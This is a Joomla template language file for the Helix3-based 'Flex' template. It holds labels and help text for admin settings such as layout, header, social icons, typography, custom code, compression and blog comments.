HELIX_FEATURE_LOAD_POS_AFTER="After Module"

HELIX_BOXED_LAYOUT="Boxed Layout"
HELIX_ENABLE_BOXED_LAYOUT="Enable"
HELIX_ENABLE_BOXED_LAYOUT_DESC="Enable this option for boxed layout."
FLEX_BOXED_LAYOUT_WIDTH="Boxed Layout Width"
FLEX_BOXED_LAYOUT_WIDTH_DESC="Boxed Layout Width. Use pixels or %. Default is 1170px."
FLEX_BOXED_LAYOUT_SPACING="Boxed Layout Spacing"
FLEX_BOXED_LAYOUT_SPACING_DESC="Boxed Layout Spacing (top and bottom). Use pixels for spacing (margin) at the top and bottom. Default is 0 (no spacing/margin)."
FLEX_BOXED_LAYOUT_BORDER_RADIUS="Boxed Layout Border Radius"
FLEX_BOXED_LAYOUT_BORDER_RADIUS_DESC="Boxed Layout Border Radius. Use pixels for border radius around. Default is 4(px)."
FLEX_BOXED_LAYOUT_BACKGROUND_COLOR="Boxed Background Color"
FLEX_BOXED_LAYOUT_BACKGROUND_COLOR_DESC="Define a background color for “Boxed Layout”."

FLEX_PAGE_LOADER="Page Preloader"
FLEX_ENABLE_PAGE_LOADER="Enable Page Preloader"
FLEX_ENABLE_PAGE_LOADER_DESC="Enable Page Preloader. Default is “Yes”."

HELIX_FOOTER="Footer"
HELIX_COPYRIGHT="Copyright"
HELIX_COPYRIGHT_DESC="Show or hide copyright information."
HELIX_COMPYRIGHT_TEXT="Copyright Notice"
HELIX_COMPYRIGHT_TEXT_DESC="The Copyright Notice should contain any necessary copyright notice for claiming the intellectual property, and should identify the current owner(s) of the copyright for the content. All HTML tags are allowed."

; Social Icons
HELIX_SOCIAL_ICONS="Social Icons"
HELIX_SOCIAL_ICONS_DESC="Enable this option to show social icons."
HELIX_SOCIAL_ICON_FACEBOOK="Facebook URL"
HELIX_SOCIAL_ICON_FACEBOOK_DESC="Input the full URL to your Facebook profile page."
HELIX_SOCIAL_ICON_TWITTER="Twitter URL"
HELIX_SOCIAL_ICON_TWITTER_DESC="Input the full URL to your Twitter profile page."
HELIX_SOCIAL_ICON_GOOGLEPLUS="Google Plus URL"
HELIX_SOCIAL_ICON_GOOGLEPLUS_DESC="Input the full URL to your Google+ profile page."
HELIX_SOCIAL_ICON_INSTAGRAM="Instagram URL"
HELIX_SOCIAL_ICON_INSTAGRAM_DESC="Input the full URL to your Instagram profile page."
HELIX_SOCIAL_ICON_PINTEREST="Pinterest URL"
HELIX_SOCIAL_ICON_PINTEREST_DESC="Input the full URL to your Pinterest profile page."
HELIX_SOCIAL_ICON_LINKEDIN="Linkedin URL"
HELIX_SOCIAL_ICON_LINKEDIN_DESC="Input the full URL to your Linkedin profile page."
HELIX_SOCIAL_ICON_DRIBBBLE="Dribbble URL"
HELIX_SOCIAL_ICON_DRIBBBLE_DESC="Input the full URL to your Dribbble profile page. "
HELIX_SOCIAL_ICON_BEHANCE="Behance URL"
HELIX_SOCIAL_ICON_BEHANCE_DESC="Input the full URL to your Behance profile page."
HELIX_SOCIAL_ICON_YOUTUBE="YouTube URL"
HELIX_SOCIAL_ICON_YOUTUBE_DESC="Input the full URL to your YouTube profile page."
HELIX_SOCIAL_ICON_FLICKR="Flickr URL"
HELIX_SOCIAL_ICON_FLICKR_DESC="Input the full URL to your Flickr profile page."
HELIX_SOCIAL_ICON_WHATSAPP="WhatsApp Username"
HELIX_SOCIAL_ICON_WHATSAPP_DESC="Input your WhatsApp Username, a unique username that is used to sign in to WhatsApp."
HELIX_SOCIAL_ICON_SKYPE="Skype Username"
HELIX_SOCIAL_ICON_SKYPE_DESC="Input your Skype Name, a unique user name that is used to sign in to Skype."
HELIX_SOCIAL_ICON_VK="VK Username"
HELIX_SOCIAL_ICON_VK_DESC="Input the full URL to your VK profile page."
HELIX_SOCIAL_ICON_CUSTOM="Custom"
HELIX_SOCIAL_ICON_CUSTOM_DESC="Insert your custom url with FontAwesome icon, eg. fa-thumbs-up http://flex.aplikko.com"

; Contact Info
HELIX_CONTACT_INFO="Contact Information"
HELIX_ENABLE_CONTACT_INFO="Enable"
HELIX_ENABLE_CONTACT_INFO_DESC="Enable this option to show contact information."
HELIX_CONTACT_PHONE="Phone"
HELIX_CONTACT_PHONE_DESC="Add phone number here. Leave blank if no phone is required."
FLEX_CONTACT_PHONE_ICON="Custom Phone Icon"
FLEX_CONTACT_PHONE_ICON_DESC="Custom icon for Phone number field, for example: “fa fa-phone” (Font Awesome icon) or “pe pe-7s-headphones” (Pixeden icon). If empty, default icon will be shown."
HELIX_CONTACT_MOBILE="Mobile"
HELIX_CONTACT_MOBILE_DESC="Add mobile number here. Leave blank if no phone is required."
FLEX_CONTACT_MOBILE_ICON="Custom Mobile Icon"
FLEX_CONTACT_MOBILE_ICON_DESC="Custom icon for Mobile Number field, for example: “fa fa-mobile” (Font Awesome icon) or “pe pe-7s-phone” (Pixeden icon). If empty, default icon will be shown."
HELIX_CONTACT_EMAIL="Email"
HELIX_CONTACT_EMAIL_DESC="Add email address here. Leave blank if no email is required."
FLEX_CONTACT_EMAIL_ICON="Custom Email Icon"
FLEX_CONTACT_EMAIL_ICON_DESC="Custom Icon for Email field, for example: “fa fa-envelope” (Font Awesome icon) or “pe pe-7s-mail” (Pixeden icon). If empty, default icon will be shown."
FLEX_CONTACT_EMAIL_CLOAKING="Email Cloaking"
FLEX_CONTACT_EMAIL_CLOAKING_DESC="Enable or disable Email protection which cloaks email addresses, making them unreadable for spambots. You can disable it, if you are experiencing javascript conflict. Default value is “Yes”."
FLEX_ENABLE_CONTACT_TIME="Enable Office Hours"
HELIX_CONTACT_OPEN_HOURS="Open Hours"
HELIX_CONTACT_OPEN_HOURS_DESC="Insert your open hours here. eg. Mon - Fri 8:00 - 17:30"
FLEX_CONTACT_OPEN_HOURS_ICON="Custom Open Hours Icon"
FLEX_CONTACT_OPEN_HOURS_ICON_DESC="Custom Icon for Open Hours field, for example: “fa fa-clock-o” (Font Awesome icon) or “pe pe-7s-timer” (Pixeden icon). If empty, default icon will be shown."
FLEX_OFFICE_HOURS="Office Hours"
FLEX_OFFICE_HOURS_DESC="Add office hours text here. Leave blank if none is required."

; Coming Soon 
HELIX_COMINGSOON="Coming Soon"
HELIX_COMINGSOON_MODE="Coming Soon Mode"
HELIX_COMINGSOON_MODE_DESC="Helix3 introduces a Coming Soon page which allows you to display a stylish page indicating that your site is either being worked on or under construction"
HELIX_COMINGSOON_TITLE="Coming Soon Title"
HELIX_COMINGSOON_TITLE_DESC="Write a headline for your Coming soon page."
HELIX_COMINGSOON_DATE="Date"
HELIX_COMINGSOON_DATE_DESC="Insert date used for Countdown timer"
HELIX_COMINGSOON_CONTENT="Content"
HELIX_COMINGSOON_CONTENT_DESC="Description field so you can let visitors know what’s coming. Tip: Add also contact info."
FLEX_COMINGSOOON_BACKGROUND_IMAGE="Coming Soon<br />Background Image"
FLEX_COMINGSOOON_BACKGROUND_IMAGE_DESC="Select/upload image for Coming Soon image. If no image is selected, default color will be used for background."
FLEX_COMINGSOOON_LOGO="Coming Soon Logo"
FLEX_COMINGSOOON_LOGO_DESC="Select a Coming Soon page logo, and if you leave it blank, then will get template logo."

; Error page (404) 
FLEX_ERROR_PAGE="Error Page (404)"
FLEX_ERROR_PAGE_BACKGROUND_IMAGE="Error Page (404)<br />Background Image"
FLEX_ERROR_PAGE_BACKGROUND_IMAGE_DESC="Select/upload image for “Error Page” image. If no image is selected, default color will be used for background."
FLEX_ERROR_PAGE_LOGO="Error Page Logo"
FLEX_ERROR_PAGE_LOGO_DESC="Select a Error Page logo, if leave it blank then will get template logo."

; Offline Page
FLEX_OFFLINE_PAGE="Offline Page"
FLEX_OFFLINE_PAGE_BACKGROUND_IMAGE="Offline Page (404)<br />Background Image"
FLEX_OFFLINE_PAGE_BACKGROUND_IMAGE_DESC="Select/upload image for “Offline Page” image. If no image is selected, default color will be used for background."
HELIX_COMINGSOON_COUNTER="Countdown timer"
HELIX_COMINGSOON_COUNTER_DESC="Enable or Disable Coming Soon Countdown timer?"
HELIX_OFFLINE_CONTENT="Countdown timer Content"
HELIX_OFFLINE_CONTENT_DESC="You can insert custom content for “Countdown timer”. For example: “We'll be back in:”"
HELIX_OFFLINE_DATE="Offline Date"
HELIX_OFFLINE_DATE_DESC="Insert date used for Countdown timer"


; Header Tab
COM_TEMPLATES_HEADER_FIELDSET_LABEL = "<i class='fa fa-columns'></i>Header"
HELIX_HEADER="Header"
FLEX_HEADER_HEIGHT="Header Height"
FLEX_HEADER_HEIGHT_DESC="Use slider to specify height for your Header. For example: 90px. The range is from 40px to 150px. Default is 90."

FLEX_STICKY_HEADER_ANIMATION="Sticky Header Animation Effect"
FLEX_STICKY_HEADER_ANIMATION_DESC="Select Animation Effect for appearing of the Sticky Header, when scrolled. Default effect is: “Fade In Down”."
FLEX_STICKY_HEADER_ANIMATION_NONE="None"
FLEX_STICKY_HEADER_ANIMATION_FADE="Fade"
FLEX_STICKY_HEADER_ANIMATION_FADE_IN_DOWN="Fade In Down"
FLEX_STICKY_HEADER_ANIMATION_HEADER_IN_3D="Header In (3D)"
FLEX_STICKY_HEADER_ANIMATION_TWIST="Twist (3D)"

FLEX_HEADER_BG_COLOR="Header Background Color"
FLEX_HEADER_BG_COLOR_DESC="Select custom background color for Header. Background color can be also “RGBA” color (with alpha transparency) to create semi-transparent effect."
FLEX_HEADER_LINK_COLOR="Header Link Color"
FLEX_HEADER_LINK_COLOR_DESC="Select custom solid color for links in Header. This applies mostly for “Top level” links in Header."
FLEX_HEADER_ACTIVE_LINK_COLOR="Header “Active” Link Color"
FLEX_HEADER_ACTIVE_LINK_COLOR_DESC="Select custom solid color for “Active” (selected) links in Header. By default, this color is “major_color” defined in “Presets” tab, but you can override it here."
HELIX_MEGA_MENU_BG_COLOR="Dropdown background color"
HELIX_MEGA_MENU_BG_COLOR_DESC="Select custom Megamenu “Dropdown” background color. Megamenu “Dropdown” links are second, third and fourth level links (menu items) showing under “Top level (parent) links”. Background color can be also “RGBA” color (with alpha transparency) to create semi-transparent effect."
HELIX_MEGA_MENU_TEXT_COLOR="Dropdown Text Color"
HELIX_MEGA_MENU_TEXT_COLOR_DESC="Select custom Megamenu Dropdown text color. Megamenu “Dropdown” links are second, third and fourth level links (menu items) showing under “Top level (parent) links”."

; Sticky Header
FLEX_STICKY_HEADER="Sticky Header"
FLEX_STICKY_HEADER_ENABLE="Enable Sticky Header"
FLEX_STICKY_HEADER_ENABLE_DESC="Enable to get the header content area to stay visible at the top of the screen as you scroll through that content. Header tend to contain navigation and this may improve UX of website."
FLEX_STICKY_LOGO="Custom Logo for “Sticky Header”"
FLEX_STICKY_LOGO_DESC="Select (Upload) custom “Sticky” Logo, that will appear <strong>only</strong> in “Sticky Header”. Can be an JPG, GIF, PNG image or SVG graphic (with URL path to SVG graphic in uploader). If empty, Default logo will show."
FLEX_STICKY_HEADER_HEIGHT="Sticky Header Height"
FLEX_STICKY_HEADER_HEIGHT_DESC="Use slider to specify height for your Sticky Header. For example: 60px. The range is from 40px to 100px. Default is 75px."
FLEX_STICKY_HEADER_BG_COLOR="Sticky Header Background Color"
FLEX_STICKY_HEADER_BG_COLOR_DESC="Define custom background color for “Sticky Header”. Background color can be also “RGBA” color (with alpha transparency) to create semi-transparent effect."
FLEX_STICKY_HEADER_LINK_COLOR="Sticky Header Link Color"
FLEX_STICKY_HEADER_LINK_COLOR_DESC="Select custom solid color for links in “Sticky Header”. This applies mostly for “Top level” links in Sticky Header."
FLEX_STICKY_HEADER_ACTIVE_LINK_COLOR="Sticky Header “Active” Link Color"
FLEX_STICKY_HEADER_ACTIVE_LINK_COLOR_DESC="Select custom solid color for “Active” (selected) links in “Sticky Header”. By default, this color is “major_color” defined in “Presets” tab, but you can override it here."

FLEX_STICKY_HEADER_APPEAR_POINT="Sticky Header Appear Point"
FLEX_STICKY_HEADER_APPEAR_POINT_DESC="Use this option to specify exact point where Sticky Header should appear (from the top). The range is from 1px to 1000px. Default is 250px."

; Presets Tab
COM_TEMPLATES_PRESET_FIELDSET_LABEL = "<i class='fa fa-paint-brush'></i>Presets"
HELIX_PRESETS="Preset Styles"
HELIX_STYLING_OPTIONS="Styling Options"
HELIX_BODY_BACKGROUND_IMAGE_LABEL="Body Background Image"
HELIX_BODY_BACKGROUND_IMAGE="Select Image"
HELIX_BODY_BACKGROUND_IMAGE_DESC="Select image which will be used as the background. To remove a background image, simply delete the URL from the settings field."
HELIX_BACKGROUND_COLOR="Background Color"
HELIX_BACKGROUND_COLOR_DESC="Define a background solid color that will show behind the content."
HELIX_TEXT_COLOR="Text Color"
HELIX_TEXT_COLOR_DESC="The color attribute specifies the main color of the text."
HELIX_MAJOR_COLOR="Major Color"
HELIX_MAJOR_COLOR_DESC="Major color setting based on chosen Preset"


; Layout Tab
COM_TEMPLATES_LAYOUT_FIELDSET_LABEL="<i class='fa fa-list-alt'></i>Layout"
HELIX_SAVE_COPY="Save as Copy"
HELIX_DELETE="Delete"
HELIX_ENTER_LAYOUT_NAME="Enter Layout Name"
HELIX_APPLY="Apply"
HELIX_CANCEL="Cancel"
HELIX_ARRANGE_ROWS="Arrange Rows"
HELIX_ADD_ROW="Add Row"
HELIX_ROW_SETTINGS="Row Settings"
HELIX_REMOVE_ROW="Remove Row"
HELIX_NONE="None"
HELIX_COLUMN_SETTINGS="Column Settings3"
HELIX_ADD_COLUMNS="Add Columns"
HELIX_SETTINGS="Settings"
HELIX_REMOVE="Remove"
HELIX_SECTION_TITLE="Section Title"
HELIX_SECTION_TITLE_DESC="Section title will be replaced by section ID in the front-end. e.g. If you set section title as \"<strong>Main Body</strong>\" then you will get output as &lt;section id=\"main-body\"&gt; &lt; /section&gt; in the frontend."
HELIX_SECTION_BACKGROUND_COLOR="Background Color"
HELIX_SECTION_BACKGROUND_COLOR_DESC="Background color will be applied in this section. Leave this field blank if this section does not require a background color."
HELIX_SECTION_TEXT_COLOR="Text Color"
HELIX_SECTION_TEXT_COLOR_DESC="Text color will be applied in this section. Leave this field blank if this section does not require a text color."
HELIX_SECTION_BACKGROUND_IMAGE="Background Image"
HELIX_SECTION_BACKGROUND_IMAGE_DESC="Set background image for this section. Always set a background-color to be used if the image is unavailable."
HELIX_BG_REPEAT="Background Repeat"
HELIX_BG_REPEAT_DESC="Set how a background image will be repeated. By default, a background-image is no repeated, and the image is placed at the top left corner."
HELIX_BG_REPEAT_NO="No Repeat"
HELIX_BG_REPEAT_ALL="Repeat All"
HELIX_BG_REPEAT_HORIZ="Repeat Horizontally"
HELIX_BG_REPEAT_VERTI="Repeat Vertically"
HELIX_BG_REPEAT_INHERIT="Inherit"
HELIX_BG_SIZE="Background Size"
HELIX_BG_SIZE_DESC="Set the size of the background image. Default vaule is cover - is means scale the background image to be as large as possible so that the background area is completely covered by the background image."
HELIX_BG_COVER="Cover"
HELIX_BG_CONTAIN="Contain"
HELIX_BG_INHERIT="Inherit"
HELIX_BG_ATTACHMENT="Background Attachment"
HELIX_BG_ATTACHMENT_DESC="Set whether a background image attachment is fixed or scrolls."
HELIX_BG_ATTACHMENT_FIXED="Fixed"
HELIX_BG_ATTACHMENT_SCROLL="Scroll"
HELIX_BG_ATTACHMENT_INHERIT="Inherit"
HELIX_BG_POSITION="Background Position"
HELIX_BG_POSITION_DESC="Set the starting position of a background image."
HELIX_BG_POSITION_LEFT_TOP="Left Top"
HELIX_BG_POSITION_LEFT_CENTER="Left Center"
HELIX_BG_POSITION_LEFT_BOTTOM="Left Bottom"
HELIX_BG_POSITION_CENTER_TOP="Center Top"
HELIX_BG_POSITION_CENTER_CENTER="Center Center"
HELIX_BG_POSITION_CENTER_BOTTOM="Center Bottom"
HELIX_BG_POSITION_RIGHT_TOP="Right Top"
HELIX_BG_POSITION_RIGHT_CENTER="Right Center"
HELIX_BG_POSITION_RIGHT_BOTTOM="Right Bottom"
HELIX_LINK_COLOR="Link Color"
HELIX_LINK_COLOR_DESC="Leave this field blank if link color is not required."
HELIX_LINK_HOVER_COLOR="Link Hover Color"
HELIX_LINK_HOVER_COLOR_DESC="Leave this field blank if link hover color is not required."
HELIX_HIDDEN_MOBILE="Hide on Mobile"
HELIX_HIDDEN_MOBILE_DESC="Enable this option to hide this section for mobile devices."
HELIX_HIDDEN_TABLET="Hide on Tablet"
HELIX_HIDDEN_TABLET_DESC="Enable this option to hide this section for Tablets."
HELIX_HIDDEN_DESKTOP="Hide on Desktop"
HELIX_HIDDEN_DESKTOP_DESC="Enable this option to hide this section for larger display like desktops or laptops."
HELIX_PADDING="Padding"
HELIX_PADDING_DESC="Set all the padding area a the space between the content of the element and its border (Top Right Bottom Left). Negative values are not allowed."
HELIX_MARGIN="Margin"
HELIX_MARGIN_DESC="Set the margin for all four sides (Top Right Bottom Left). Negative values are also allowed."
HELIX_ROW_FULL_WIDTH="Fluid Width"
HELIX_ROW_FULL_WIDTH_DESC="Enable this option to make this section fluid. Fluid row will help you to publish full width content like google map."
HELIX_CUSTOM_CLASS="Custom CSS Class"
HELIX_CUSTOM_CLASS_DESC="If you wish to style particular content element differently, then use this field to add a class name and then refer to it in your css file."
HELIX_COMPONENT="Make Component Area"
HELIX_COMPONENT_DESC="Enable this option to make this column as a Component area. If you already selected component area for another column then unselect that one first then select this one. <br><strong>Note:</strong> Joomla message section will also be loaded inside this column."
HELIX_MODULE_POSITION="Module Position"
HELIX_MODULE_POSITION_DESC="Select any suitable module position from the list. Do not set one module position to multiple position."
HELIX_TABLET_LAYOUT="Tablet Layout"
HELIX_TABLET_LAYOUT_DESC="Set the class of this column for tablets."
HELIX_MOBILE_LAYOUT="Mobile Layout"
HELIX_MOBILE_LAYOUT_DESC="Set the class of this column for mobile devices"

READ_MORE_TITLE="Read More"

; Mega Menu 
COM_TEMPLATES_MENU_FIELDSET_LABEL="<i class='fa fa-list-ul'></i>Menu"
HELIX_MEGAMENU="Mega Menu"
HELIX_MEGAMENU_SELECT="Select Menu"
HELIX_MEGAMENU_SELECT_DESC="Select menu to display as Main menu"
HELIX_MENU="Menu"
HELIX_MENU_TYPE="Menu Type"
HELIX_MENU_TYPE_DESC="Select a suitable menu type from the list. You need to add module to offcanvas position from the Module Manager."
HELIX_MEGAMENU_OFFCANVAS="Mega Menu &amp; Off Canvas"
HELIX_MEGAMENU="Mega Menu"
HELIX_OFFCANVAS="Off Canvas"
FLEX_OFFCANVAS_ICON="Off Canvas Icon"
FLEX_OFFCANVAS_ICON_DESC="Choose Icon for “Off Canvas toggler”, between Font Awesome and Pixeden icons (toggler icon). Default is “Font Awesome”."
HELIX_MEGAMENU_DROPDOWN_WIDTH="Dropdown Width"
HELIX_MEGAMENU_DROPDOWN_WIDTH_DESC="Input width of mega menu dropdown."
HELIX_MENU_DROPDOWN_ANIMATION="Dropdown Animation"
HELIX_MENU_DROPDOWN_ANIMATION_DESC="Select dropdown menu animation from the list."
HELIX_NO_ANIMATION="No Animation"
HELIX_FADE_ANIMATION="Fade"
HELIX_ZOOM_ANIMATION="Zoom"
HELIX_FADE_UP_ANIMATION="Fade In Up"
HELIX_ROTATE_MENU_ANIMATION="Rotate In"
HELIX_SLIDEDOWN_ANIMATION="Slide Down"
HELIX_DROPIN_ANIMATION="Drop In"
HELIX_TWIST_ANIMATION="Twist"
HELIX_FADE_DOWN_FADE_UP_ANIMATION="Fade In Down, Fade Out Up"

HELIX_MENU_OFFCANVAS_ANIMATION="Off canvas Animation"
HELIX_MENU_OFFCANVAS_ANIMATION_DESC="Select a animation for off canvas menu"

HELIX_OFFANIMATION_DEFAULT="Default"
HELIX_OFFANIMATION_FULLSCREEN="FullScreen"
HELIX_OFFANIMATION_FULLSCREEN_FROM_TOP="FullScreen From Top"
HELIX_OFFANIMATION_SLIDE_RIGHT="Slide Right"
HELIX_OFFANIMATION_DARK_PLUS="Dark Plus"

FLEX_OFFCANVAS_BG_COLOR="Off Canvas Background Color"
FLEX_OFFCANVAS_BG_COLOR_DESC="Define custom background color for Off Canvas. Can be RGBA (with alpha transparency) as well."
FLEX_OFFCANVAS_COLOR="Off Canvas Text Color"
FLEX_OFFCANVAS_COLOR_DESC="Define custom text color for Off Canvas."

HELIX_NO_MODULE_OFFCANVAS="Please publish modules in <strong>offcanvas</strong> position."


; Typography
COM_TEMPLATES_TYPOGRAPHY_FIELDSET_LABEL="<i class='fa fa-font'></i>Typography"
HELIX_FONT_FAMILY="Font Family"
HELIX_FONT_WEIGHT_STYLE="Font Weight & Style"
HELIX_FONT_SUBSET="Font Subset"
HELIX_FONT_SIZE="Font Size"

HELIX_GFONT_API="Google Font API"
HELIX_GFONT_API_DESC="Get your API key from the link given above and click the <strong>Save</strong> button after inserting the API Key."
HELIX_GOOGLE_FONTS_LIST="Google Fonts List"
HELIX_GOOGLE_FONTS_LIST_DESC="You may require <strong>Google Fonts API Key</strong> to update the font list. Get your API Key from here: <a href='https://developers.google.com/fonts/docs/developer_api' target='_blank'>https://developers.google.com/fonts/docs/developer_api</a>"
HELIX_UPDATE_FONTS_LIST="Update Fonts List"
HELIX_UPDATE_FONTS_LIST_DESC="It allows you to refresh the list of available Google fonts. If there are any new ones, this button allows you to quickly update fonts with just one click, and they will be automatically added in to Helix 3 Framework."
HELIX_UPDATE_FONTS_CLICK="One Click update"

HELIX_BODY_FONT="Body Font"
HELIX_BODY_FONT_DESC="This google font will be applied on &lt;body&gt; tag."
HELIX_ENABLE_FONT="Enable"
HELIX_ENABLE_FONT_DESC="Enable google for this CSS Selector."
HELIX_SELECT_FONT="Select Font"
HELIX_SELECT_FONT_DESC="Set the default font."
HEADING1_FONT="Heading1 Font"
HEADING1_FONT_DESC="This google font will be applied on &lt;h1&gt; tag."
HEADING2_FONT="Heading2 Font"
HEADING2_FONT_DESC="This google font will be applied on &lt;h2&gt; tag."
HEADING3_FONT="Heading3 Font"
HEADING3_FONT_DESC="This google font will be applied on &lt;h3&gt; tag."
HEADING4_FONT="Heading4 Font"
HEADING4_FONT_DESC="This google font will be applied on &lt;h4&gt; tag."
HEADING5_FONT="Heading5 Font"
HEADING5_FONT_DESC="This google font will be applied on &lt;h5&gt; tag."
HEADING6_FONT="Heading6 Font"
HEADING6_FONT_DESC="This google font will be applied on &lt;h6&gt; tag."
NAVIGATION_FONT="Navigation Font"
NAVIGATION_FONT_DESC="This google font will be applied on main navigation."
CUSTOM_FONT="Custom Font"
CUSTOM_FONT_DESC="Apply this google font to any custom CSS selector."
HELIX_FONT_CUSTOM_SELECTORS="CSS Selectors"
HELIX_FONT_CUSTOM_SELECTORS_DESC="Add custom CSS selectors. Separated by comma."

; Custom Code
COM_TEMPLATES_CUSTOM_CODE_FIELDSET_LABEL="<i class='fa fa-code'></i>Custom Code"
HELIX_CUSTOM_CODE="Custom Code"
HELIX_BEFORE_HEAD="Before &lt; /head&gt; "
HELIX_BEFORE_HEAD_DESC="Any code you place here will appear in the head section of every page of your site. This is useful when you need to add verification code, javascript or css links to all pages."
HELIX_BEFORE_BODY="Before &lt; /body&gt; "
HELIX_BEFORE_BODY_DESC="Any code you place here will appear in bottom of body section of all pages of your site. This is useful if you need to input a tracking code for a state counter such as Google Analytics or Clicky."
HELIX_CUSTOM_CSS="Custom CSS"
HELIX_CUSTOM_CSS_DESC="You can use custom CSS to add your own styles or overwrite default CSS of a template or extension. This option is good small changes in the stylesheets. For more extensive changes (more then 10 lines of code) we suggest to use the custom.css file."
HELIX_CUSTOM_JS="Custom Javascript"
HELIX_CUSTOM_JS_DESC="You can add custom javascripts code. It loads your custom Javascript file after all other Javascript files (except special hard coded occasions), allowing you to be the last one who will affect your website."

; Advanced
COM_TEMPLATES_ADVANCE_FIELDSET_LABEL="<i class='fa fa-cog'></i>Advanced"
HELIX_CACHE_SETTINGS="Cache Settings"
HELIX_CSS_COMPRESS="Compress CSS"
HELIX_CSS_COMPRESS_DESC=""
HELIX_JS_COMPRESS="Compress Javascripts"
HELIX_CSS_COMPRESS_DESC=""
HELIX_EXCLUDE_JS="Exclude Javascript"
HELIX_EXCLUDE_JS_DESC="Enter the names of javascript files seperated by comma that you don't want to compress. e.g. jquery.min.js, main.js"
FLEX_COMPRESS_HTML="Compress HTML"
FLEX_STRIP_WHITESPACE="Strip Whitespace"
FLEX_STRIP_WHITESPACE_DESC="Strip (trim) whitespace (or other characters) from the page that will remove/delete all extra spaces from text. You can transform some badly formatted text into a nice clean web page."
HELIX_LESS="Less"
HELIX_ENABLE_LESS="Compile LESS to CSS"
HELIX_ENABLE_LESS_DESC="Helix 3 is developed with LESS. When customize your site, we suggest you to work with LESS files. All your changes in the LESS files will be compiled into the final CSS files. It will override previus changes."
FLEX_LAZYLOAD_IMAGES="Lazy Load Images"
FLEX_LAZYLOAD_IMAGES_LABEL="Enable Lazy Load"
FLEX_LAZYLOAD_IMAGES_DESC="Use this option to enable “Lazy loading” for images, throughout the website. Lazy loading is technique that defers loading of non-critical resources at page load time, and makes page loading significantly faster. When someone adds a image to a web page, the resource references a small placeholder. As a user browses the web page, the actual resource is cached by the browser and replaces the placeholder when the resource becomes visible on the user’s screen. When we lazy load <img> elements, we use JavaScript to check if they’re in the viewport. If they are, their src (and sometimes data-src) attributes are populated with URLs to the desired image content."
FLEX_SMOOTH_SCROLL="Smooth Scroll"
FLEX_SMOOTH_SCROLL_VERSION="Smooth Scroll Version"
FLEX_SMOOTH_SCROLL_VERSION_DESC="Smooth scrolling experience for websites. This is the standalone version of SmoothScroll for individual websites and themes. You can choose between 1.3.8 (old) version and latest 1.4.9, or disable it if you experience problems. Default value is “Version 1.3.8”."
HELIX_IMPORT_EXPORT="Export/Import Settings"
HELIX_IMPORT_EXPORT_FIELD="Settings Import/Export"
HELIX_SETTINGS_EXPORT="Export Settings"
HELIX_SETTINGS_IMPORT="Import Settings"
FLEX_MOOTOOLS_FIXES="Mootools Fixes"
FLEX_REMOVE_MOOTOOLS="Remove Mootools"
FLEX_REMOVE_MOOTOOLS_DESC="If you're facing problem caused by Mootools library (javascripts), then you can disable all javascripts that are part of Mootools library. Mootools has not been supported for Joomla 3+, mostly because it is causing this conflict with jQuery (jQuery is default part of Joomla 3.x core). Default is “No”."
FLEX_MOOTOOLS_FIX="Mootools Fix"
FLEX_MOOTOOLS_FIX_DESC="Enable if you want to apply Mootools fix for various conflicts with jQuery library and scripts. Default is “No”."

FLEX_REMOVE_JOOMLA_GENERATOR="Remove Joomla Generator Tag"
FLEX_REMOVE_JOOMLA_GENERATOR_LABEL="Remove Joomla Generator Tag"
FLEX_REMOVE_JOOMLA_GENERATOR_DESC="You can remove Remove Joomla Generator Tag: meta name=“generator” content=“Joomla! - Open Source Content Management”"

; Blog
COM_TEMPLATES_BLOG_FIELDSET_LABEL="<i class='fa fa-thumb-tack'></i>Blog"

BLOG_LAYOUT="Blog Layout"
FLEX_BLOG_LAYOUT="Choose Blog Layout"
FLEX_BLOG_LAYOUT_DESC="Choose which Blog layout will be used for blog: Masonry or Classic. Default is “Masonry”."
FLEX_MASONRY="Masonry"
FLEX_CLASSIC="Classic"
FLEX_BLOG_ITEM_SPACING="Item’s Inner Spacing"
FLEX_BLOG_ITEM_SPACING_DESC="Use slider to specify “spacing” for item. This will be “inner spacing” for all items (articles). For example: 10px. The range is from 0px to 40px. Default is 0."
FLEX_BLOG_ITEM_BG_COLOR="Item’s Background Color"
FLEX_BLOG_ITEM_BG_COLOR_DESC="You can set “custom” color for all Blog items (articles)."

HELIX_COMMENTS="Comments Settings"
HELIX_COMMENTING_ENGINE="Commenting Engine"
HELIX_COMMENTING_ENGINE_DESC="Choose which commenting engine will be used for blog post. Select disable in order to hide comments from joomla article."
HELIX_DISQUSS="Disqus"
HELIX_INTENSEDEBATE="IntenseDebate"
HELIX_FB="Facebook"
HELIX_DISABLED="Disabled"
HELIX_DISQUS_SUBDOMAIN="Disqus Username/Subdomain"
HELIX_DISQUS_SUBDOMAIN_DESC="Set the subdomain that you registered at disqus.com"
HELIX_DISQUS_DEV_MODE="Disqus Developer Mode"
HELIX_DISQUS_DEV_MODE_DESC="Enable this option if you are testing behind a firewall or proxy, and not yet on your live site."
HELIX_INTENSEDEBATE_ACC="IntenseDebate Account"
HELIX_INTENSEDEBATE_ACC_DESC="Set the intenseDebate account"
HELIX_FB_ID="Facebook Application ID"
HELIX_FB_ID_DESC="Set the Facebook Application ID, visit https://developers.facebook.com/apps to get application id" 
HELIX_FB_COMMENTS_WIDTH="Comments Width"
HELIX_FB_COMMENTS_WIDTH_DESC="Width of the comments plugin in pixel, eg. 500. Note: Facebook doesn't provide a Facebook Comment code for responsive (fluid grid) websites. It uses only static width for comments box."
HELIX_FB_COMMENTS_PER_PAGE="Comments Per Page"
HELIX_FB_COMMENTS_PER_PAGE_DESC="Set the number of comments to displayed per page" 
HELIX_COMMENTS_COUNT="Comments Count"
FLEX_COMMENTS_COUNT="comments"
HELIX_COMMENTS_COUNT_DESC="Show comments count on blog view or frontpage"
HELIX_SOCIAL_SHARE="Social Share"
HELIX_ENABLE_SOCIAL_SHARE="Enable Social Share"
HELIX_ENABLE_SOCIAL_SHARE_DESC="Enable this option to social share buttons in joomla blog list or single article."
HELIX_POST_FORMAT="Post Format"
HELIX_SHOW_POST_FORMAT="Show Icon"
HELIX_SHOW_POST_FORMAT_DESC="Enable this to show post format icon."

HELIX_POST_FORMAT="Post Format"
HELIX_SHOW_POST_FORMAT="Show Icon"
HELIX_SHOW_POST_FORMAT_DESC="Enable this to show post format icon."
FLEX_CUSTOM_STANDARD_POST_FORMAT_ICON="Standard Post Format Icon"
FLEX_CUSTOM_STANDARD_POST_FORMAT_ICON_DESC="Custom Icon for Standard Post Format, for example: “fa fa-pencil-square-o” (Font Awesome icon) or “pe pe-7s-note” (Pixeden icon). If empty, default icon will be shown."
FLEX_CUSTOM_GALLERY_POST_FORMAT_ICON="Gallery Post Format Icon"
